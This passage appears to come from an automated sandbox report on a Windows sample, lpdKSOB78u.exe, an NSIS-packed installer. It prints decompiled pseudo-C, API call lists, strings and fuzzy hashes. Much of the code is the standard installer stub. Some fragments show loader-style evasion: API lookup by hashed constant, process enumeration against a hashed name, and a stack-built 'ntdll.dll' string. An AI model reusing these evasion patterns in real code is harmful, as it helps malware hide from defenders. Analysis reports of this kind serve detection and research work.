                                                                                                                          				_v24 = E703C4652(_v8, 0x873d1860);
                                                                                                                          				_v12 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                          				if(_v12 != 0xffffffff) {
                                                                                                                          					_v580 = 0x22c;
                                                                                                                          					_t25 =  &_v580;
                                                                                                                          					Process32FirstW(_v12, _t25);
                                                                                                                          					if(_t25 != 0) {
                                                                                                                          						while(E703C41FF( &_v544) != _a4) {
                                                                                                                          							if(Process32NextW(_v12,  &_v580) != 0) {
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							return 0;
                                                                                                                          						}
                                                                                                                          						return 1;
                                                                                                                          					}
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 703C4288
                                                                                                                          • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 703C42AC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.213465230.00000000703C3000.00000040.00020000.sdmp, Offset: 703C0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.213449488.00000000703C0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213454915.00000000703C1000.00000080.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213460076.00000000703C2000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213470666.00000000703C5000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2353314856-0
                                                                                                                          • Opcode ID: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                                                                                          • Instruction ID: 5a3b4cb2c9949d0bd35ca36518613eec542b9ff6d7853bb8ef31a0e40d4bc6d9
                                                                                                                          • Opcode Fuzzy Hash: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                                                                                          • Instruction Fuzzy Hash: D5111834D10119AEEB11DFB0CC4ABAEBBBAEF04340F1049A5F925E5194E7B0DE519A51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004065C1(CHAR* _a4) {
                                                                                                                          				void* _t2;
                                                                                                                          
                                                                                                                          				_t2 = FindFirstFileA(_a4, 0x42c108); // executed
                                                                                                                          				if(_t2 == 0xffffffff) {
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				FindClose(_t2);
                                                                                                                          				return 0x42c108;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNELBASE(74B5FA90,0042C108,0042BCC0,00405D16,0042BCC0,0042BCC0,00000000,0042BCC0,0042BCC0,74B5FA90,?,74B5F560,00405A35,?,74B5FA90,74B5F560), ref: 004065CC
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004065D8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2295610775-0
                                                                                                                          • Opcode ID: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                                                                          • Instruction ID: 5989989b5290daefe0063212e93516784f0ef67bd1aed84395a1ba9114d6aba9
                                                                                                                          • Opcode Fuzzy Hash: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                                                                          • Instruction Fuzzy Hash: 1BD01231508130ABC7455B387D4C85B7A98AF153317618A37F466F12E4C734CC228698
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00403A60(void* __eflags) {
                                                                                                                          				intOrPtr _v4;
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				int _v12;
                                                                                                                          				void _v16;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				intOrPtr* _t17;
                                                                                                                          				void* _t25;
                                                                                                                          				void* _t27;
                                                                                                                          				int _t28;
                                                                                                                          				void* _t31;
                                                                                                                          				int _t34;
                                                                                                                          				int _t35;
                                                                                                                          				intOrPtr _t36;
                                                                                                                          				int _t39;
                                                                                                                          				char _t57;
                                                                                                                          				CHAR* _t59;
                                                                                                                          				signed char _t63;
                                                                                                                          				CHAR* _t74;
                                                                                                                          				intOrPtr _t76;
                                                                                                                          				CHAR* _t81;
                                                                                                                          
                                                                                                                          				_t76 =  *0x42f454;
                                                                                                                          				_t17 = E00406656(2);
                                                                                                                          				_t84 = _t17;
                                                                                                                          				if(_t17 == 0) {
                                                                                                                          					_t74 = 0x42a8b8;
                                                                                                                          					"1033" = 0x30;
                                                                                                                          					 *0x436001 = 0x78;
                                                                                                                          					 *0x436002 = 0;
                                                                                                                          					E00406134(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8b8, 0);
                                                                                                                          					__eflags =  *0x42a8b8;
                                                                                                                          					if(__eflags == 0) {
                                                                                                                          						E00406134(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a8b8, 0);
                                                                                                                          					}
                                                                                                                          					lstrcatA("1033", _t74);
                                                                                                                          				} else {
                                                                                                                          					E004061AB("1033",  *_t17() & 0x0000ffff);
                                                                                                                          				}
                                                                                                                          				E00403D25(_t71, _t84);
                                                                                                                          				_t80 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
                                                                                                                          				 *0x42f4e0 =  *0x42f45c & 0x00000020;
                                                                                                                          				 *0x42f4fc = 0x10000;
                                                                                                                          				if(E00405CD3(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                                                                                                                          					L16:
                                                                                                                          					if(E00405CD3(_t92, _t80) == 0) {
                                                                                                                          						E004062E0(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
                                                                                                                          					}
                                                                                                                          					_t25 = LoadImageA( *0x42f440, 0x67, 1, 0, 0, 0x8040);
                                                                                                                          					 *0x42ec28 = _t25;
                                                                                                                          					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                                                                                          						L21:
                                                                                                                          						if(E0040140B(0) == 0) {
                                                                                                                          							_t27 = E00403D25(_t71, __eflags);
                                                                                                                          							__eflags =  *0x42f500;
                                                                                                                          							if( *0x42f500 != 0) {
                                                                                                                          								_t28 = E00405446(_t27, 0);
                                                                                                                          								__eflags = _t28;
                                                                                                                          								if(_t28 == 0) {
                                                                                                                          									E0040140B(1);
                                                                                                                          									goto L33;
                                                                                                                          								}
                                                                                                                          								__eflags =  *0x42ec0c; // 0x0
                                                                                                                          								if(__eflags == 0) {
                                                                                                                          									E0040140B(2);
                                                                                                                          								}
                                                                                                                          								goto L22;
                                                                                                                          							}
                                                                                                                          							ShowWindow( *0x42a898, 5); // executed
                                                                                                                          							_t34 = E004065E8("RichEd20"); // executed
                                                                                                                          							__eflags = _t34;
                                                                                                                          							if(_t34 == 0) {
                                                                                                                          								E004065E8("RichEd32");
                                                                                                                          							}
                                                                                                                          							_t81 = "RichEdit20A";
                                                                                                                          							_t35 = GetClassInfoA(0, _t81, 0x42ebe0);
                                                                                                                          							__eflags = _t35;
                                                                                                                          							if(_t35 == 0) {
                                                                                                                          								GetClassInfoA(0, "RichEdit", 0x42ebe0);
                                                                                                                          								 *0x42ec04 = _t81;
                                                                                                                          								RegisterClassA(0x42ebe0);
                                                                                                                          							}
                                                                                                                          							_t36 =  *0x42ec20; // 0x0
                                                                                                                          							_t39 = DialogBoxParamA( *0x42f440, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DFD, 0); // executed
                                                                                                                          							E004039B0(E0040140B(5), 1);
                                                                                                                          							return _t39;
                                                                                                                          						}
                                                                                                                          						L22:
                                                                                                                          						_t31 = 2;
                                                                                                                          						return _t31;
                                                                                                                          					} else {
                                                                                                                          						_t71 =  *0x42f440;
                                                                                                                          						 *0x42ebe4 = E00401000;
                                                                                                                          						 *0x42ebf0 =  *0x42f440;
                                                                                                                          						 *0x42ebf4 = _t25;
                                                                                                                          						 *0x42ec04 = 0x40a210;
                                                                                                                          						if(RegisterClassA(0x42ebe0) == 0) {
                                                                                                                          							L33:
                                                                                                                          							__eflags = 0;
                                                                                                                          							return 0;
                                                                                                                          						}
                                                                                                                          						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                                                                                          						 *0x42a898 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f440, 0);
                                                                                                                          						goto L21;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t71 =  *(_t76 + 0x48);
                                                                                                                          					_t86 = _t71;
                                                                                                                          					if(_t71 == 0) {
                                                                                                                          						goto L16;
                                                                                                                          					}
                                                                                                                          					_t74 = 0x42e3e0;
                                                                                                                          					E00406134(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f498, 0x42e3e0, 0);
                                                                                                                          					_t57 =  *0x42e3e0; // 0x43
                                                                                                                          					if(_t57 == 0) {
                                                                                                                          						goto L16;
                                                                                                                          					}
                                                                                                                          					if(_t57 == 0x22) {
                                                                                                                          						_t74 = 0x42e3e1;
                                                                                                                          						 *((char*)(E00405C10(0x42e3e1, 0x22))) = 0;
                                                                                                                          					}
                                                                                                                          					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                                                                                          					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                                                                                          						L15:
                                                                                                                          						E0040624D(_t80, E00405BE5(_t74));
                                                                                                                          						goto L16;
                                                                                                                          					} else {
                                                                                                                          						_t63 = GetFileAttributesA(_t74);
                                                                                                                          						if(_t63 == 0xffffffff) {
                                                                                                                          							L14:
                                                                                                                          							E00405C2C(_t74);
                                                                                                                          							goto L15;
                                                                                                                          						}
                                                                                                                          						_t92 = _t63 & 0x00000010;
                                                                                                                          						if((_t63 & 0x00000010) != 0) {
                                                                                                                          							goto L15;
                                                                                                                          						}
                                                                                                                          						goto L14;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}

























                                                                                                                          0x00403bd9
                                                                                                                          0x00403be3
                                                                                                                          0x00403be9
                                                                                                                          0x00403bee
                                                                                                                          0x00403bfd
                                                                                                                          0x00403d1b
                                                                                                                          0x00403d1b
                                                                                                                          0x00000000
                                                                                                                          0x00403d1b
                                                                                                                          0x00403c0c
                                                                                                                          0x00403c47
                                                                                                                          0x00000000
                                                                                                                          0x00403c47
                                                                                                                          0x00403b0f
                                                                                                                          0x00403b0f
                                                                                                                          0x00403b12
                                                                                                                          0x00403b14
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403b1e
                                                                                                                          0x00403b2e
                                                                                                                          0x00403b33
                                                                                                                          0x00403b3a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403b3e
                                                                                                                          0x00403b40
                                                                                                                          0x00403b4d
                                                                                                                          0x00403b4d
                                                                                                                          0x00403b55
                                                                                                                          0x00403b5b
                                                                                                                          0x00403b83
                                                                                                                          0x00403b8b
                                                                                                                          0x00000000
                                                                                                                          0x00403b6d
                                                                                                                          0x00403b6e
                                                                                                                          0x00403b77
                                                                                                                          0x00403b7d
                                                                                                                          0x00403b7e
                                                                                                                          0x00000000
                                                                                                                          0x00403b7e
                                                                                                                          0x00403b79
                                                                                                                          0x00403b7b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403b7b
                                                                                                                          0x00403b5b

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                                                            • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                                                                          • lstrcatA.KERNEL32(1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\lpdKSOB78u.exe" ,00000000), ref: 00403ADB
                                                                                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,74B5FA90), ref: 00403B50
                                                                                                                          • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                                                                          • GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                                                                          • LoadImageA.USER32 ref: 00403BB7
                                                                                                                            • Part of subcall function 004061AB: wsprintfA.USER32 ref: 004061B8
                                                                                                                          • RegisterClassA.USER32 ref: 00403BF4
                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
                                                                                                                          • CreateWindowExA.USER32 ref: 00403C41
                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403C77
                                                                                                                          • GetClassInfoA.USER32 ref: 00403CA3
                                                                                                                          • GetClassInfoA.USER32 ref: 00403CB0
                                                                                                                          • RegisterClassA.USER32 ref: 00403CB9
                                                                                                                          • DialogBoxParamA.USER32 ref: 00403CD8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: "C:\Users\user\Desktop\lpdKSOB78u.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$B
                                                                                                                          • API String ID: 1975747703-3767301218
                                                                                                                          • Opcode ID: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                                                                                          • Instruction ID: 8734c0f5f73e26911640e72846d54346a9337973c4420bd4a4a6803de24d7ebf
                                                                                                                          • Opcode Fuzzy Hash: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                                                                                          • Instruction Fuzzy Hash: 1B61C6702042007EE620BF669D46F373AACDB4474DF94443FF945B62E2CA7DA9068A2D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00402EF1(void* __eflags, signed int _a4) {
                                                                                                                          				long _v8;
                                                                                                                          				long _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				long _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				intOrPtr _v28;
                                                                                                                          				intOrPtr _v32;
                                                                                                                          				intOrPtr _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				char _v300;
                                                                                                                          				long _t54;
                                                                                                                          				void* _t62;
                                                                                                                          				intOrPtr _t65;
                                                                                                                          				void* _t68;
                                                                                                                          				intOrPtr* _t70;
                                                                                                                          				long _t82;
                                                                                                                          				signed int _t89;
                                                                                                                          				intOrPtr _t92;
                                                                                                                          				intOrPtr _t100;
                                                                                                                          				void* _t104;
                                                                                                                          				intOrPtr _t105;
                                                                                                                          				long _t106;
                                                                                                                          				long _t109;
                                                                                                                          				intOrPtr* _t110;
                                                                                                                          
                                                                                                                          				_v8 = 0;
                                                                                                                          				_v12 = 0;
                                                                                                                          				 *0x42f450 = GetTickCount() + 0x3e8;
                                                                                                                          				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\lpdKSOB78u.exe", 0x400);
                                                                                                                          				_t104 = E00405DE6("C:\\Users\\hardz\\Desktop\\lpdKSOB78u.exe", 0x80000000, 3);
                                                                                                                          				 *0x40a018 = _t104;
                                                                                                                          				if(_t104 == 0xffffffff) {
                                                                                                                          					return "Error launching installer";
                                                                                                                          				}
                                                                                                                          				E0040624D("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\lpdKSOB78u.exe");
                                                                                                                          				E0040624D(0x437000, E00405C2C("C:\\Users\\hardz\\Desktop"));
                                                                                                                          				_t54 = GetFileSize(_t104, 0);
                                                                                                                          				 *0x429470 = _t54;
                                                                                                                          				_t109 = _t54;
                                                                                                                          				if(_t54 <= 0) {
                                                                                                                          					L22:
                                                                                                                          					E00402E52(1);
                                                                                                                          					if( *0x42f458 == 0) {
                                                                                                                          						goto L30;
                                                                                                                          					}
                                                                                                                          					if(_v12 == 0) {
                                                                                                                          						L26:
                                                                                                                          						_t110 = GlobalAlloc(0x40, _v20);
                                                                                                                          						_t105 = 8;
                                                                                                                          						 *0x415458 = 0x40d450;
                                                                                                                          						 *0x415454 = 0x40d450;
                                                                                                                          						 *0x40b8b0 = _t105;
                                                                                                                          						 *0x40bdcc = 0;
                                                                                                                          						 *0x40bdc8 = 0;
                                                                                                                          						 *0x415450 = 0x415450; // executed
                                                                                                                          						E00405E15( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
                                                                                                                          						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                                                                                          						 *0x40a01c = _t62;
                                                                                                                          						if(_t62 != 0xffffffff) {
                                                                                                                          							_t65 = E0040343E( *0x42f458 + 0x1c);
                                                                                                                          							 *0x429474 = _t65;
                                                                                                                          							 *0x429468 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                                                          							_t68 = E004031B7(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                                                                                                          							if(_t68 == _v20) {
                                                                                                                          								 *0x42f454 = _t110;
                                                                                                                          								 *0x42f45c =  *_t110;
                                                                                                                          								if((_v40 & 0x00000001) != 0) {
                                                                                                                          									 *0x42f460 =  *0x42f460 + 1;
                                                                                                                          								}
                                                                                                                          								_t45 = _t110 + 0x44; // 0x44
                                                                                                                          								_t70 = _t45;
                                                                                                                          								_t100 = _t105;
                                                                                                                          								do {
                                                                                                                          									_t70 = _t70 - _t105;
                                                                                                                          									 *_t70 =  *_t70 + _t110;
                                                                                                                          									_t100 = _t100 - 1;
                                                                                                                          								} while (_t100 != 0);
                                                                                                                          								 *((intOrPtr*)(_t110 + 0x3c)) =  *0x429464;
                                                                                                                          								E00405DA1(0x42f480, _t110 + 4, 0x40);
                                                                                                                          								return 0;
                                                                                                                          							}
                                                                                                                          							goto L30;
                                                                                                                          						}
                                                                                                                          						return "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                          					}
                                                                                                                          					E0040343E( *0x429460);
                                                                                                                          					if(E00403428( &_a4, 4) == 0 || _v8 != _a4) {
                                                                                                                          						goto L30;
                                                                                                                          					} else {
                                                                                                                          						goto L26;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					do {
                                                                                                                          						_t106 = _t109;
                                                                                                                          						asm("sbb eax, eax");
                                                                                                                          						_t82 = ( ~( *0x42f458) & 0x00007e00) + 0x200;
                                                                                                                          						if(_t109 >= _t82) {
                                                                                                                          							_t106 = _t82;
                                                                                                                          						}
                                                                                                                          						if(E00403428(0x421460, _t106) == 0) {
                                                                                                                          							E00402E52(1);
                                                                                                                          							L30:
                                                                                                                          							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                                          						}
                                                                                                                          						if( *0x42f458 != 0) {
                                                                                                                          							if((_a4 & 0x00000002) == 0) {
                                                                                                                          								E00402E52(0);
                                                                                                                          							}
                                                                                                                          							goto L19;
                                                                                                                          						}
                                                                                                                          						E00405DA1( &_v40, 0x421460, 0x1c);
                                                                                                                          						_t89 = _v40;
                                                                                                                          						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                                                                                          							_a4 = _a4 | _t89;
                                                                                                                          							 *0x42f500 =  *0x42f500 | _a4 & 0x00000002;
                                                                                                                          							_t92 = _v16;
                                                                                                                          							 *0x42f458 =  *0x429460;
                                                                                                                          							if(_t92 > _t109) {
                                                                                                                          								goto L30;
                                                                                                                          							}
                                                                                                                          							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                                                                          								_v12 = _v12 + 1;
                                                                                                                          								_t109 = _t92 - 4;
                                                                                                                          								if(_t106 > _t109) {
                                                                                                                          									_t106 = _t109;
                                                                                                                          								}
                                                                                                                          								goto L19;
                                                                                                                          							} else {
                                                                                                                          								goto L22;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L19:
                                                                                                                          						if(_t109 <  *0x429470) {
                                                                                                                          							_v8 = E0040670D(_v8, 0x421460, _t106);
                                                                                                                          						}
                                                                                                                          						 *0x429460 =  *0x429460 + _t106;
                                                                                                                          						_t109 = _t109 - _t106;
                                                                                                                          					} while (_t109 != 0);
                                                                                                                          					goto L22;
                                                                                                                          				}
                                                                                                                          			}


                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402F05
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\lpdKSOB78u.exe,00000400), ref: 00402F21
                                                                                                                            • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\lpdKSOB78u.exe,80000000,00000003), ref: 00405DEA
                                                                                                                            • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\lpdKSOB78u.exe,C:\Users\user\Desktop\lpdKSOB78u.exe,80000000,00000003), ref: 00402F6A
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AF
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030CF
                                                                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311C
                                                                                                                          • C:\Users\user\Desktop, xrefs: 00402F4C, 00402F51, 00402F57
                                                                                                                          • Null, xrefs: 00402FEA
                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040316A
                                                                                                                          • soft, xrefs: 00402FE1
                                                                                                                          • Inst, xrefs: 00402FD8
                                                                                                                          • "C:\Users\user\Desktop\lpdKSOB78u.exe" , xrefs: 00402EF1
                                                                                                                          • C:\Users\user\Desktop\lpdKSOB78u.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
                                                                                                                          • Error launching installer, xrefs: 00402F41
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                          • String ID: "C:\Users\user\Desktop\lpdKSOB78u.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\lpdKSOB78u.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                          • API String ID: 2803837635-3446583419
                                                                                                                          • Opcode ID: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                                                                          • Instruction ID: e8b4360117e31fb5ea1b260af931ada4a8b54667cc236f60df091846fad1fe42
                                                                                                                          • Opcode Fuzzy Hash: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                                                                          • Instruction Fuzzy Hash: B471D171A00204ABDB20AF64DD45B9A7BB8EB14719F60803BE505BB2D1D77CAE468B5C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 69%
                                                                                                                          			E703C372D(intOrPtr _a4) {
                                                                                                                          				signed int _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				void* _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				intOrPtr _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				intOrPtr _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				intOrPtr _v52;
                                                                                                                          				intOrPtr _v56;
                                                                                                                          				intOrPtr _v60;
                                                                                                                          				intOrPtr _v64;
                                                                                                                          				intOrPtr _v68;
                                                                                                                          				intOrPtr _v72;
                                                                                                                          				void* _v76;
                                                                                                                          				intOrPtr _v80;
                                                                                                                          				signed char _v84;
                                                                                                                          				long _v88;
                                                                                                                          				short _v90;
                                                                                                                          				short _v92;
                                                                                                                          				short _v94;
                                                                                                                          				short _v96;
                                                                                                                          				short _v98;
                                                                                                                          				short _v100;
                                                                                                                          				short _v102;
                                                                                                                          				short _v104;
                                                                                                                          				short _v106;
                                                                                                                          				char _v108;
                                                                                                                          				short _t141;
                                                                                                                          				short _t142;
                                                                                                                          				short _t143;
                                                                                                                          				short _t144;
                                                                                                                          				short _t145;
                                                                                                                          				short _t146;
                                                                                                                          				short _t147;
                                                                                                                          				short _t148;
                                                                                                                          				short _t149;
                                                                                                                          				int _t165;
                                                                                                                          				intOrPtr _t175;
                                                                                                                          				signed int _t195;
                                                                                                                          				signed int _t210;
                                                                                                                          				signed int _t222;
                                                                                                                          
                                                                                                                          				_v24 = _v24 & 0x00000000;
                                                                                                                          				_v48 = _v48 & 0x00000000;
                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                          				_t141 = 0x6e;
                                                                                                                          				_v108 = _t141;
                                                                                                                          				_t142 = 0x74;
                                                                                                                          				_v106 = _t142;
                                                                                                                          				_t143 = 0x64;
                                                                                                                          				_v104 = _t143;
                                                                                                                          				_t144 = 0x6c;
                                                                                                                          				_v102 = _t144;
                                                                                                                          				_t145 = 0x6c;
                                                                                                                          				_v100 = _t145;
                                                                                                                          				_t146 = 0x2e;
                                                                                                                          				_v98 = _t146;
                                                                                                                          				_t147 = 0x64;
                                                                                                                          				_v96 = _t147;
                                                                                                                          				_t148 = 0x6c;
                                                                                                                          				_v94 = _t148;
                                                                                                                          				_t149 = 0x6c;
                                                                                                                          				_v92 = _t149;
                                                                                                                          				_v90 = 0;
                                                                                                                          				_v16 = _v16 & 0x00000000;
                                                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                                                          				_v36 = _v36 & 0x00000000;
                                                                                                                          				_t23 =  &_v44;
                                                                                                                          				 *_t23 = _v44 & 0x00000000;
                                                                                                                          				_t222 =  *_t23;
                                                                                                                          				_v20 = E703C45AA();
                                                                                                                          				_v64 = E703C4652(_v20, 0x8a111d91);
